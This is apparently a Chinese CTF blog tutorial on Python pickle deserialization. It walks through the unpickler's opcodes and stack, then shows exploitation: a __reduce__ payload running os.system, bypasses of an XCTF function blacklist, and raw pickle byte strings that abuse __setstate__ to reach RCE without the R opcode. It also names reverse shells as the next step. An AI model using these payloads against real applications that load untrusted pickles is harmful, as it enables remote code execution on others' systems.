<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="学习python反序列化, Web,CTF,Misc,JS,Python">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>学习python反序列化 | V1cuna&#39;s blog</title>
    <link rel="icon" type="image/png" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/V1cuna.png">

    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/css/my.css">

    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 4.2.0"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/V1cuna.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">V1cuna&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/V1cuna.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">V1cuna&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/featureimages/23.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">学习python反序列化</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E6%80%BB%E7%BB%93/">
                                <span class="chip bg-color">-python反序列化 -总结</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-05-02
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    4.4k
                </div>
                

                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="0X01-Pickle是干什么用的：序列化、反序列化"><a href="#0X01-Pickle是干什么用的：序列化、反序列化" class="headerlink" title="0X01:Pickle是干什么用的：序列化、反序列化"></a>0X01:Pickle是干什么用的：序列化、反序列化</h2><p>　　在很多任务中，我们可能会需要把一些内容存储起来，以备后续利用。如果我们要存储的内容只是一条字符串或是数字，那么我们只需要把它写进文件就行。然而，如果我们需要存储的东西是一个dict、一个list，甚至一个对象：</p>
<pre><code class="python3">class dairy():
    date = 20200502
    text = "abcd"
    todo = ['hello', 'CTF', '作业']

today = dairy()</code></pre>
<p>　　要把这样的dairy实例<code>today</code>存放在文件里，日后还要支持随时导入，就是很麻烦的事情了。通行的做法是：通过一套方案，把这个<code>today</code> <strong>翻译</strong>成一个字符串，然后把字符串写进文件；读取的时候，通过读文件拿到字符串，然后<strong>翻译</strong>成<code>dairy</code>类的一个实例。</p>
<p>　　我们把“对象 -&gt; 字符串”的翻译过程称为“序列化”；相应地，把“字符串 -&gt; 对象”的过程称为“反序列化”  。需要保存一个对象的时候，就把它序列化变成字符串；需要从字符串中提取一个对象的时候，就把它反序列化。各大语言都有序列化库，而很多时候，<strong>不恰当的反序列化会成为攻击的目标</strong>。</p>
<p>　　Python提供的序列化库是pickle. 下面，我们举一个例子来说明其工作方式：</p>
<p><img src="https://i.loli.net/2020/06/05/ak8xFcrW3Ym5bne.png" alt="python1.png"></p>
<p>　　在这里，我们定义了一个很复杂的对象传递给<code>x</code>，然后执行<code>pickle.dumps(x)</code>，来把<code>x</code>翻译成字符串。接下来，把这个字符串翻译成对象交给<code>r</code>，可以发现<code>r</code>已经是我们最开始打包的那个复杂对象。</p>
<p>​        存储字符串比存储对象方便得多——这就是pickle的意义所在。</p>
<p>​        把对象序列化成字符串，然后就可以方便地存储、传输了</p>
<p>　　这就是pickle最基础的使用方法。pickle不仅可以读写字符串，也可以读写文件：只需要采用<code>pickle.dump()</code>和<code>pickle.load()</code>.</p>
<p>　　另外有一点需要注意：对于我们自己定义的class，如果直接以形如<code>date = 20191029</code>的方式赋初值，<strong>则这个<code>date</code>不会被打包！如下图：</strong></p>
<p><img src="https://i.loli.net/2020/06/04/nmCzqPZO9RxDMAQ.png" alt="python2.png"></p>
<p>解决方案是写一个<code>__init__</code>方法， 也就是这样：</p>
<p><img src="https://i.loli.net/2020/06/04/cB1yxCAi8ZRtnms.png" alt="python3.png"></p>
<p>简而言之:</p>
<ul>
<li><strong>序列化过程：</strong></li>
</ul>
<p>(1)从对象提取所有属性,并将属性转化为名值对<br>(2)写入对象的类名<br>(3)写入名值对</p>
<ul>
<li><strong>反序列化过程：</strong></li>
</ul>
<p>(1)获取 pickle 输入流<br>(2)重建属性列表<br>(3)根据类名创建一个新的对象<br>(4)将属性复制到新的对象中</p>
<p>注意自己定义的class，一定要把初值写进<code>__init__</code></p>
<h3 id="pickle-loads机制"><a href="#pickle-loads机制" class="headerlink" title="pickle.loads机制"></a>pickle.loads机制</h3><p>pickle.loads是一个供我们调用的接口。其底层实现是基于<code>_Unpickler</code>类。_load 和 _loads代码实现如下：<img src="https://pic1.zhimg.com/80/v2-579207611b45146b993b7b6ddd1d8cec_720w.jpg" alt="img"></p>
<h3 id="Unpickler类：反序列化"><a href="#Unpickler类：反序列化" class="headerlink" title="Unpickler类：反序列化"></a>Unpickler类：反序列化</h3><p>　　在反序列化过程中，<code>_Unpickler</code>（以下称为机器吧）维护了两个东西：栈区和存储区。结构如下（本图片仅为示意图）：　</p>
<p><img src="https://pic2.zhimg.com/80/v2-5e2eeae4c4943c31aee406fa3b467301_720w.jpg" alt="img">机器维护的两个结构</p>
<p>　　<strong>栈</strong>是unpickle机最核心的数据结构，所有的数据操作几乎都在栈上。为了应对数据嵌套，栈区分为两个部分：当前栈专注于维护<strong>最顶层的信息</strong>，而前序栈维护下层的信息。这两个栈区的操作过程将在讨论MASK指令时解释。</p>
<p>　　<strong>存储区</strong>可以类比内存，用于存取变量。它是一个数组，以<strong>下标</strong>为索引。它的每一个单元可以用来存储任何东西，但是说句老实话，大多数情况下我们并不需要这个存储区。</p>
<p>　　您可以想象，一台机器读取我们输入的字符串，然后操作自己内部维护的各种结构，最后吐出来一个结果——这就是我们莫得感情的<code>_Unpickler</code>。为了研究它，也为了看懂那些乱七八糟的字符串，我们需要一个有力的调试器。这就是<code>pickletools</code>。</p>
<h3 id="pickletools：调试器"><a href="#pickletools：调试器" class="headerlink" title="pickletools：调试器"></a>pickletools：调试器</h3><p>　　pickletools是python自带的pickle调试器，有三个功能：<strong>反汇编</strong>一个已经被打包的字符串、<strong>优化</strong>一个已经被打包的字符串、返回一个迭代器来供程序使用。我们一般使用前两种。来看看效果吧：</p>
<p><img src="https://pic2.zhimg.com/80/v2-1a929863ed21996548d6f7c93759e619_720w.jpg" alt="img"></p>
<p><img src="https://pic3.zhimg.com/80/v2-5a4aedd8db8446ba20bd0421d5e1288a_720w.jpg" alt="img">原始字符串的反汇编结果</p>
<p>　　这就是反汇编功能：解析那个字符串，然后告诉你这个字符串干了些什么。<strong>每一行都是一条指令。</strong>接下来试一试优化功能：</p>
<p><img src="https://pic4.zhimg.com/80/v2-2300f9b2a1c93e09e146c9683c5a74fb_720w.jpg" alt="img"></p>
<p><img src="https://pic3.zhimg.com/80/v2-c54043a85cd8b19a70fb751c65344a4e_720w.jpg" alt="img">优化后的结果</p>
<p>　　可以看到，字符串<code>s</code>比以前短了很多，而且反汇编结果中，<code>BINPUT</code>指令没有了。所谓“优化”，其实就是把不必要的<code>PUT</code>指令给删除掉。这个<code>PUT</code>意思是把当前栈的栈顶复制一份，放进储存区——很明显，我们这个class并不需要这个操作，可以省略掉这些<code>PUT</code>指令。</p>
<p>　　利用pickletools，我们能很方便地看清楚每条语句的作用、检验我们手动构造出的字符串是否合法……总之，是我们调试的利器。现在手上有了工具，我们开始研究这个字符串是如何被pickle解读的吧。</p>
<p>　　<strong>以下内容建议对照pickle的源码来阅读</strong>。您可以这样找到pickle源码的位置：</p>
<p><img src="https://pic3.zhimg.com/80/v2-c2418d1ee750ef599becec3de5724abe_720w.jpg" alt="img"></p>
<h2 id="0X02反序列化机器-引用https-zhuanlan-zhihu-com-p-89132768"><a href="#0X02反序列化机器-引用https-zhuanlan-zhihu-com-p-89132768" class="headerlink" title="0X02反序列化机器(引用https://zhuanlan.zhihu.com/p/89132768)"></a>0X02反序列化机器(引用<a href="https://zhuanlan.zhihu.com/p/89132768" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/89132768</a>)</h2><p>　　pickle构造出的字符串，有很多个版本。在pickle.loads时，可以用Protocol参数指定协议版本，例如指定为0号版本：</p>
<p><img src="https://pic4.zhimg.com/80/v2-77a48037eeb2dc95334ae0311b4de9cf_720w.jpg" alt="img"></p>
<p>　　目前这些协议有0,2,3,4号版本，默认为3号版本。这所有版本中，0号版本是人类最可读的；之后的版本加入了一大堆不可打印字符，不过这些新加的东西都只是为了优化，本质上没有太大的改动。</p>
<p>　　一个好消息是，<strong>pickle协议是向前兼容的</strong>。0号版本的字符串可以直接交给pickle.loads()，不用担心引发什么意外。</p>
<p>　　刚刚说过，字符串中包含了很多条指令。这些指令一定以<strong>一个字节</strong>的指令码（opcode）开头；接下来读取多少内容，由指令码来决定（严格规定了读取几个参数、参数的结束标志符等）。<strong>指令编码是紧凑的</strong>，一条指令结束之后立刻就是下一条指令。</p>
<blockquote>
<p>注：GLOBAL操作符读取全局变量，是使用的<code>find_class</code>函数。而<code>find_class</code>对于不同的协议版本实现也不一样。总之，它干的事情是“去<code>x</code>模块找到<code>y</code>”，<code>y</code>必须在<code>x</code>的顶层（也即，y不能在嵌套的内层）。</p>
</blockquote>
<p>　　程序的车轮继续滚滚向前。它遇到了<code>)</code>这个操作符。它的作用是“把一个空的tuple压入当前栈”。处理完这个操作符之后，接下来程序读取到了<code>x81</code>操作符。它的作用是：从栈中先弹出一个元素，记为<code>args</code>；再弹出一个元素，记为<code>cls</code>。接下来，执行<code>cls.__new__(cls, *args)</code> ，然后把得到的东西压进栈。说人话，那就是：从栈中弹出一个参数和一个class，然后利用这个参数实例化class，把得到的实例压进栈。</p>
<p>　　容易看出，上面的操作全都执行完了之后，栈里面还剩下一个元素——它是被实例化了的<code>Student</code>对象，目前这里面什么也没有，因为当初实例化它的时候，<code>args</code>是个空的数组。</p>
<p>　　让我们继续分析。程序现在读入了一个<code>}</code>，它的意思是“把一个空的dict压进栈”。然后是<code>MARK</code>操作符，这个操作符干的事情称为<code>load_mark</code>：</p>
<ul>
<li>把<strong>当前栈</strong>这个整体，作为一个list，压进<strong>前序栈</strong>。</li>
<li>把<strong>当前栈</strong>清空。</li>
</ul>
<p>　　现在您知道为什么栈区要分成当前栈和前序栈两部分了吗？前序栈保存了程序运行至今的（不在顶层的）完整的栈信息，而当前栈专注于处理顶层的事件。</p>
<p>　　讲到这里，我们不得不介绍另一个操作——<code>pop_mark</code>。它没有操作符，只供其他的操作符来调用。干的事情自然是<code>load_mark</code>的反向操作：</p>
<ul>
<li>记录一下当前栈的信息，作为一个list，在<code>load_mark</code>结束时返回。 </li>
<li>弹出<strong>前序栈</strong>的栈顶，用这个list来覆盖<strong>当前栈</strong>。</li>
</ul>
<p><code>load_mark</code>相当于进入一个子过程，而<code>pop_mark</code>相当于从子过程退出，把栈恢复成<strong>调用子过程之前</strong>的情况。<strong>所有与栈的切换相关的事情，都靠调用这两个方法来完成</strong>。因此<code>load_mark</code>和<code>pop_mark</code>是栈管理的核心方法。</p>
<p>　　回到我们这个程序，继续看MARK之后的内容：</p>
<p>　　下一个操作符是<code>V</code>。它的意义是：读入一个字符串，以<code>\n</code>结尾；然后把这个字符串压进栈中。我们看到这里有四个<code>V</code>操作，它们全都执行完的时候，<strong>当前栈</strong>里面的元素是：（由底到顶）<code>name, rxz, grade, G2</code>。前序栈只有一个元素，是一个list，这个list里面有两个元素：一个空的Student实例，以及一个空的dict。</p>
<p>　　现在我们看到了<code>u</code>操作符。它干这样的事情：</p>
<ul>
<li>调用<code>pop_mark</code>。也就是说，把当前栈的内容扔进一个数组<code>arr</code>，然后把当前栈恢复到MARK时的状态。<br>执行完成之后，<code>arr=['name', 'rxz', 'grade', 'G2']</code>；当前栈里面存的是<code>__main__.Student</code>这个类、一个空的<code>dict</code> </li>
<li>拿到当前栈的末尾元素，规定必须是一个<code>dict</code>。<br>这里，读到了栈顶那个空<code>dict</code>。 </li>
<li>两个一组地读<code>arr</code>里面的元素，前者作为key，后者作为value，存进上一条所述的<code>dict</code>。</li>
</ul>
<p>　　模拟一下这个过程，发现原先是空的那个<code>dict</code>现在变成了<code>{'name': 'rxz', 'grade': 'G2'}</code>这样一个<code>dict</code>。所以现在，当前栈里面的元素是：<code>__main__.Student</code>的一个空的实例，以及<code>{'name': 'rxz', 'grade': 'G2'}</code>这个<code>dict</code>。</p>
<p>　　下一个指令码是<code>b</code>，也就是BUILD指令。它干的事情是：</p>
<ul>
<li>把当前栈栈顶存进<code>state</code>，然后弹掉。</li>
<li>把当前栈栈顶记为<code>inst</code>，然后弹掉。 </li>
<li>利用<code>state</code>这一系列的值来<strong>更新实例</strong><code>inst</code>。把得到的对象扔进当前栈。</li>
</ul>
<blockquote>
<p>注：这里更新实例的方式是：如果<code>inst</code>拥有<code>__setstate__</code>方法，则把<code>state</code>交给<code>__setstate__</code>方法来处理；否则的话，直接把<code>state</code>这个<code>dist</code>的内容，合并到<code>inst.__dict__</code> 里面。<br>事实上，这里产生了一个安全漏洞。您可以想一想该如何利用。</p>
</blockquote>
<p>　　上面的事情干完之后，当前栈里面只剩下了一个实例——它的类型是<code>__main__.Student</code>，里面<code>name</code>值是<code>rxz</code>，<code>grade</code>值是<code>G2</code>。下一个指令是<code>.</code>（一个句点，STOP指令），pickle的字符串以它结尾，意思是：“当前栈顶元素就是反序列化的最终结果，把它弹出，收工！”</p>
<blockquote>
<p>注：使用<code>pickletools.dis</code>分析一个字符串时，如果<code>.</code>执行完毕之后栈里面还有东西，会抛出一个错误；而<code>pickle.loads</code>没有这么严格的检查——它会正常结束。 </p>
</blockquote>
<p>　　至此我们完成了一个简单例子的分析。刚刚我们通过手动模拟这台机器的运行过程，理解了pickle反序列化的原理——如何处理指令、如何管理栈等等。这已经足够我们把握pickle的思想，剩余的就是细枝末节的东西了。</p>
<p>　　但是，细枝末节的东西，往往暗藏着漏洞 :）</p>
<h2 id="reduce-的利用"><a href="#reduce-的利用" class="headerlink" title="__reduce__的利用"></a><code>__reduce__</code>的利用</h2><p>　　CTF对pickle的利用多数是在<code>__reduce__</code>方法上。它的指令码是<code>R</code>，干了这么一件事情：</p>
<ul>
<li>取当前栈的栈顶记为<code>args</code>，然后把它弹掉。</li>
<li>取当前栈的栈顶记为<code>f</code>，然后把它弹掉。</li>
<li>以<code>args</code>为参数，执行函数<code>f</code>，把结果压进当前栈。</li>
</ul>
<p>　　class的<code>__reduce__</code>方法，在pickle反序列化的时候会被执行。其底层的编码方法，就是利用了<code>R</code>指令码。 <code>f</code>要么返回字符串，要么返回一个tuple，后者对我们而言更有用。</p>
<p>　　一种很流行的攻击思路是：利用 <code>__reduce__</code> 构造恶意字符串，当这个字符串被反序列化的时候，<code>__reduce__</code>会被执行。网上已经有海量的文章谈论这种方法，所以我们在这里不过多讨论。只给出一个例子：正常的字符串反序列化后，得到一个<code>Student</code>对象。我们想构造一个字符串，它在反序列化的时候，执行<code>ls /</code>指令。那么我们只需要这样得到payload：</p>
<p><img src="https://pic3.zhimg.com/80/v2-29d11dda8c1744f64b20ef442faea55a_720w.jpg" alt="img">optimize加不加无所谓，这里为了我们查看汇编结果方便，就加上了优化</p>
<p>　　现在把payload拿给正常的程序（Student类里面没有<code>__reduce__</code>方法）去解析：</p>
<p><img src="https://pic3.zhimg.com/80/v2-4d98856db66940a5344270579de631b2_720w.jpg" alt="img">即使Student类是正常的，pickle.loads仍然执行了os.system('ls /')</p>
<p>　　那么，如何过滤掉reduce呢？由于<code>__reduce__</code>方法对应的操作码是<code>R</code>，只需要<strong>把操作码<code>R</code>过滤掉</strong>就行了。这个可以很方便地利用<code>pickletools.genops</code>来实现。</p>
<p>　　如果reduce这一套手段被过滤，我们应该如何利用呢？</p>
<h2 id="绕过函数黑名单"><a href="#绕过函数黑名单" class="headerlink" title="绕过函数黑名单"></a>绕过函数黑名单</h2><p>　　有一种过滤方式：不禁止<code>R</code>指令码，但是对<code>R</code>执行的函数有黑名单限制。典型的例子是2018-XCTF-HITB-WEB : Python’s-Revenge。给了好长好长一串黑名单：</p>
<pre><code class="text">black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]</code></pre>
<p> 　　可惜<code>platform.popen()</code>不在名单里，它可以做到类似<code>system</code>的功能。这题死于黑名单有漏网之鱼。</p>
<p>　　另外，还有一个解（估计是出题人的预期解），那就是利用map来干这件事：</p>
<pre><code class="text">class Exploit(object):
    def __reduce__(self):
     return map,(os.system,["ls"])</code></pre>
<p> 　　总之，黑名单不可取。要禁止reduce这一套方法，最稳妥的方式是禁止掉<code>R</code>这个指令码。</p>
<h2 id="不用reduce，也能RCE"><a href="#不用reduce，也能RCE" class="headerlink" title="不用reduce，也能RCE"></a>不用reduce，也能RCE</h2><p>　　<strong>reduce</strong><code>与</code>R<code>指令是绑定的，禁止了</code>R<code>指令就禁止了</code><strong>reduce</strong><code>方法。那么，在禁止</code>R`指令的情况下，我们还能RCE吗？这就是本文研究的重点。</p>
<p>　　现在的目标是，利用指令码，构造出任意命令执行。那么我们需要找到一个函数调用<code>fun(arg)</code>，其中<code>fun</code>和<code>arg</code>都必须可控。</p>
<p>　　审pickle源码，来看看BUILD指令（指令码为<code>b</code>）是如何工作的：</p>
<p><img src="https://pic2.zhimg.com/80/v2-ae7ce8d82f16d90bda791e4bc5e06f1d_720w.jpg" alt="img">BUILD指令实现</p>
<p>　　这里的实现方式也就是上文的注所提到的：如果<code>inst</code>拥有<code>__setstate__</code>方法，则把<code>state</code>交给<code>__setstate__</code>方法来处理；否则的话，直接把<code>state</code>这个<code>dist</code>的内容，合并到<code>inst.__dict__</code>里面。</p>
<p>　　它有什么安全隐患呢？我们来想想看：<code>Student</code>原先是没有<code>__setstate__</code>这个方法的。那么我们利用<code>{'__setstate__': os.system}</code>来BUILE这个对象，那么现在对象的<code>__setstate__</code>就变成了<code>os.system</code>；接下来利用<code>"ls /"</code>来再次BUILD这个对象，则会执行<code>setstate("ls /")</code> ，而此时<code>__setstate__</code>已经被我们设置为<code>os.system</code>，因此实现了RCE.</p>
<p>　　payload构造如下：</p>
<pre><code class="text">payload = b'\x80\x03c__main__\nStudent\n)\x81}(V__setstate__\ncos\nsystem\nubVls /\nb.'</code></pre>
<p>　　成功RCE！接下来可以通过反弹shell来控制靶机了。</p>
<p>　　有一个可以改进的地方：这份payload由于没有返回一个Student，导致后面抛出异常。要让后面无异常也很简单：干完了恶意代码之后把栈弹到空，然后压一个正常Student进栈。payload构造如下：</p>
<pre><code class="text">payload = b'\x80\x03c__main__\nStudent\n)\x81}(V__setstate__\ncos\nsystem\nubVls /\nb0c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00ruaX\x05\x00\x00\x00gradeX\x03\x00\x00\x00wwwub.'</code></pre>
<p><img src="https://pic2.zhimg.com/80/v2-fd188e8d3e3f341d719019b7e869bf9d_720w.jpg" alt="img">绿色框内为恶意代码</p>
<p>　　没有抛出异常。</p>
<p>　　**至此，我们完成了不使用<code>R</code>指令、无副作用的RCE。</p>
